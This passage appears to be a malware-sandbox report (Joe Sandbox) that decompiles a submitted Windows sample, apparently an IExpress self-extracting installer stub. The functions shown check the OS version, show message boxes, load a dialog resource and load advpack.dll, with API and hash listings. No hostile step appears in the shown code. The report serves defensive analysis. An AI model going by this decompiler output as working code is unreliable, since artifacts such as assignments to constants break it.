                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0xe88184 = 1;
                                                                                                                                                                                                        						 *0xe88180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0xe89a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0xe88a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E00E82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E00E82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xe88a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0xe88a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("cent");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E00E8681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E00E867C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E00E828E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0xe89a40 = _t119;
                                                                                                                                                                                                        						 *0xe88184 = 1;
                                                                                                                                                                                                        						 *0xe88180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0xe89a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xe88184 = _t135;
                                                                                                                                                                                                        							 *0xe88180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E00E844B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E00E86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e837cb
                                                                                                                                                                                                        0x00e837cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e837d5
                                                                                                                                                                                                        0x00e837db
                                                                                                                                                                                                        0x00e837e8
                                                                                                                                                                                                        0x00e837ea
                                                                                                                                                                                                        0x00e837ea
                                                                                                                                                                                                        0x00e837ea
                                                                                                                                                                                                        0x00e837f0
                                                                                                                                                                                                        0x00e837f6
                                                                                                                                                                                                        0x00e83805
                                                                                                                                                                                                        0x00e83817
                                                                                                                                                                                                        0x00e8382b
                                                                                                                                                                                                        0x00e83830
                                                                                                                                                                                                        0x00e83836
                                                                                                                                                                                                        0x00e8383b
                                                                                                                                                                                                        0x00e8383d
                                                                                                                                                                                                        0x00e838eb
                                                                                                                                                                                                        0x00e838eb
                                                                                                                                                                                                        0x00e838f2
                                                                                                                                                                                                        0x00e8390c
                                                                                                                                                                                                        0x00e83911
                                                                                                                                                                                                        0x00e83911
                                                                                                                                                                                                        0x00e83913
                                                                                                                                                                                                        0x00e8394d
                                                                                                                                                                                                        0x00e8394d
                                                                                                                                                                                                        0x00e8394f
                                                                                                                                                                                                        0x00e838a9
                                                                                                                                                                                                        0x00e838a9
                                                                                                                                                                                                        0x00e838b0
                                                                                                                                                                                                        0x00e838b2
                                                                                                                                                                                                        0x00e838b9
                                                                                                                                                                                                        0x00e838bb
                                                                                                                                                                                                        0x00e838c1
                                                                                                                                                                                                        0x00e83975
                                                                                                                                                                                                        0x00e838c7
                                                                                                                                                                                                        0x00e838de
                                                                                                                                                                                                        0x00e838e0
                                                                                                                                                                                                        0x00e838e0
                                                                                                                                                                                                        0x00e8397b
                                                                                                                                                                                                        0x00e8397d
                                                                                                                                                                                                        0x00e839a9
                                                                                                                                                                                                        0x00e8397f
                                                                                                                                                                                                        0x00e83982
                                                                                                                                                                                                        0x00e8398b
                                                                                                                                                                                                        0x00e8398d
                                                                                                                                                                                                        0x00e8398f
                                                                                                                                                                                                        0x00e8399f
                                                                                                                                                                                                        0x00e839a1
                                                                                                                                                                                                        0x00e83991
                                                                                                                                                                                                        0x00e83991
                                                                                                                                                                                                        0x00e83991
                                                                                                                                                                                                        0x00e8398f
                                                                                                                                                                                                        0x00e839af
                                                                                                                                                                                                        0x00e839b6
                                                                                                                                                                                                        0x00e83a0f
                                                                                                                                                                                                        0x00e83a0f
                                                                                                                                                                                                        0x00e83a11
                                                                                                                                                                                                        0x00e83a13
                                                                                                                                                                                                        0x00e83a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839b8
                                                                                                                                                                                                        0x00e839b8
                                                                                                                                                                                                        0x00e839ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839bc
                                                                                                                                                                                                        0x00e839bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839c3
                                                                                                                                                                                                        0x00e839c9
                                                                                                                                                                                                        0x00e839ce
                                                                                                                                                                                                        0x00e839d0
                                                                                                                                                                                                        0x00e839e3
                                                                                                                                                                                                        0x00e839e5
                                                                                                                                                                                                        0x00e839e6
                                                                                                                                                                                                        0x00e839f1
                                                                                                                                                                                                        0x00e839f7
                                                                                                                                                                                                        0x00e839fa
                                                                                                                                                                                                        0x00e83a01
                                                                                                                                                                                                        0x00e83a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83a06
                                                                                                                                                                                                        0x00e83a09
                                                                                                                                                                                                        0x00e83a09
                                                                                                                                                                                                        0x00e83a0b
                                                                                                                                                                                                        0x00e83a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83a09
                                                                                                                                                                                                        0x00e839fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839fc
                                                                                                                                                                                                        0x00e839d3
                                                                                                                                                                                                        0x00e839d8
                                                                                                                                                                                                        0x00e839da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e839dc
                                                                                                                                                                                                        0x00e839b6
                                                                                                                                                                                                        0x00e83955
                                                                                                                                                                                                        0x00e8395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83961
                                                                                                                                                                                                        0x00e83963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83969
                                                                                                                                                                                                        0x00e83969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83969
                                                                                                                                                                                                        0x00e83915
                                                                                                                                                                                                        0x00e83915
                                                                                                                                                                                                        0x00e8391b
                                                                                                                                                                                                        0x00e8391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8392d
                                                                                                                                                                                                        0x00e83933
                                                                                                                                                                                                        0x00e83938
                                                                                                                                                                                                        0x00e8393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83940
                                                                                                                                                                                                        0x00e83946

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00E83723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00E839C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00E839F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$cent
                                                                                                                                                                                                        • API String ID: 2519184315-3438608206
                                                                                                                                                                                                        • Opcode ID: 6842d6bd3feda248f3a0c1820f3a2e94d867a331343deadd576ad4e68cd3b2fd
                                                                                                                                                                                                        • Instruction ID: 1fdcd22a22abc3d295ac622bcc0433c05b133d5bb7bada227289cf2262f15d87
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6842d6bd3feda248f3a0c1820f3a2e94d867a331343deadd576ad4e68cd3b2fd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0591E571E012149FDB38AE35CD817EA77A1EB85B08F1520EAD88DB7291DB718F80CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                        			E00E86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0xe89a3c; // 0xe80000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E00E844B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t5 =  &_a16; // 0xe82ee8
                                                                                                                                                                                                        					_t24 =  *_t5;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00E80000,000007D6,00000005), ref: 00E8652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00E80000,00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E86538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00E80000,00000000,00000547,00E819E0,00000000), ref: 00E86557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E86560
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                        • API String ID: 1214682469-1603360339
                                                                                                                                                                                                        • Opcode ID: d90c9fda2d128a76bcc54ade2cf9974c426c33589eb3288458df9d5bd88125ef
                                                                                                                                                                                                        • Instruction ID: 55bc5aa2eddb3b6bb0f53fa88db3e1c7833c48a8bee7f46f743250250388c2c4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d90c9fda2d128a76bcc54ade2cf9974c426c33589eb3288458df9d5bd88125ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 350126B2100609BFDB106FAA9C08DBB7B6DEB85764F040526FE1CB3190D7718C1087A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00E86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E00E81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E00E8658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E864DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E864F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E86502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-3680919256
                                                                                                                                                                                                        • Opcode ID: c0761e9a83568dc794e87ebc44c57c2dbbdb239227f8442a3645a114f52b9d21
                                                                                                                                                                                                        • Instruction ID: 614ca556d20a3149e972497a1a6e795c12768d95cde5b3bdf906f272346d1339
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0761e9a83568dc794e87ebc44c57c2dbbdb239227f8442a3645a114f52b9d21
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E01D670A041089FEB10FB65DC49AFE7378DB50310F5015A5F58DB21C0DF709E8A8B52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00E84169(void* __eflags) {
